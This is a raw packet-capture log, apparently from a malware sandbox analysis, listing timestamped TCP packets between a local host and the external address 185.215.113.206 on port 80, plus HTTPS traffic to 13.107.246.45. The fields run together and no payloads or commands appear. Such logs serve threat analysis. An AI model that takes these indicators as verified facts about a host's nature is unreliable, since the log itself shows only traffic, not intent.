                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607796907 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607811928 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607811928 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607812881 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607857943 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.607888937 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608771086 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608783960 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608798981 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608814955 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608848095 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608854055 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608876944 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608892918 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608896971 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608896971 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608907938 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608922958 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608938932 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608954906 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608969927 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608984947 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608984947 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.608992100 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609019995 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609034061 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609054089 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609054089 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609061956 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609075069 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609088898 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609103918 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609122992 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609139919 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609141111 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609141111 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609155893 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609173059 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609189034 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609191895 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609251022 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609251022 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609787941 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609802008 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609833956 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609859943 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609868050 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609874964 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609890938 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609895945 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609906912 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609922886 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609925985 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609936953 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.609966040 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.610008955 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.628895044 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.628911018 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.628926992 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.628968954 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.628983974 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.628998041 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.628998041 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629013062 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629019022 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629029036 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629050970 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629070997 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629079103 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629086018 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629101992 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629141092 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629157066 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629158020 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629158020 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629180908 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629196882 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629213095 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629225969 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629230976 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629230976 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629244089 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629259109 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629298925 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629298925 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629367113 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629390001 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629405022 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629420042 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629437923 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629443884 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629458904 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629475117 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629476070 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629489899 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629498959 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629506111 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629528999 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629547119 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629560947 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629569054 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629569054 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629579067 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629601002 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629616976 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629633904 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629651070 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629651070 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.629690886 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.635183096 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.635977030 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.636017084 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.636646986 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.636657000 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.637130022 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.637156010 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.637181044 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.637200117 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.637224913 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.637228966 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.637244940 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.637260914 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.637274981 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.637289047 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.637293100 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.637320042 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.637343884 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.648104906 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.648287058 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.648502111 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.648529053 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.648545027 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.648555040 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.648557901 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.648561001 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.648623943 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.652147055 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.652244091 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.652244091 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.652285099 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.652311087 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.652568102 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.652594090 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.652669907 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.652924061 CET49763443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.652936935 CET4434976313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.655019999 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.655045033 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.655121088 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.655303955 CET49764443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.655319929 CET4434976413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695324898 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695466995 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695481062 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695504904 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695547104 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695547104 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695631027 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695790052 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695812941 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695828915 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695842981 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695852995 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695864916 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695882082 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695894957 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695930004 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695930004 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695935965 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695950031 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695966005 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695981026 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.695997000 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.696002007 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.696002007 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.696063042 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.696604967 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.696691036 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.696883917 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.696897984 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.696913004 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.696929932 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.696943998 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.696954012 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.696970940 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.696985006 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697000980 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697016001 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697021008 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697021008 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697031975 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697046041 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697103024 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697103024 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697103024 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697141886 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697159052 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697176933 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697189093 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697201014 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697212934 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697326899 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697635889 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697700977 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697808027 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697823048 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697839022 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697854042 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697870016 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697885036 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697896004 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697896004 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697900057 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697921038 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697952986 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697962046 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697976112 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.697990894 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698007107 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698021889 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698035955 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698051929 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698055029 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698055029 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698065042 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698093891 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698159933 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698898077 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698910952 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698926926 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698942900 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698957920 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698975086 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.698992968 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699002028 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699002981 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699049950 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699063063 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699063063 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699065924 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699081898 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699098110 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699121952 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699121952 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699203014 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699228048 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699244022 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699258089 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699273109 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699286938 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699295044 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699332952 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699332952 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699582100 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699598074 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699613094 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699629068 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.699645996 CET4974280192.168.2.6185.215.113.206
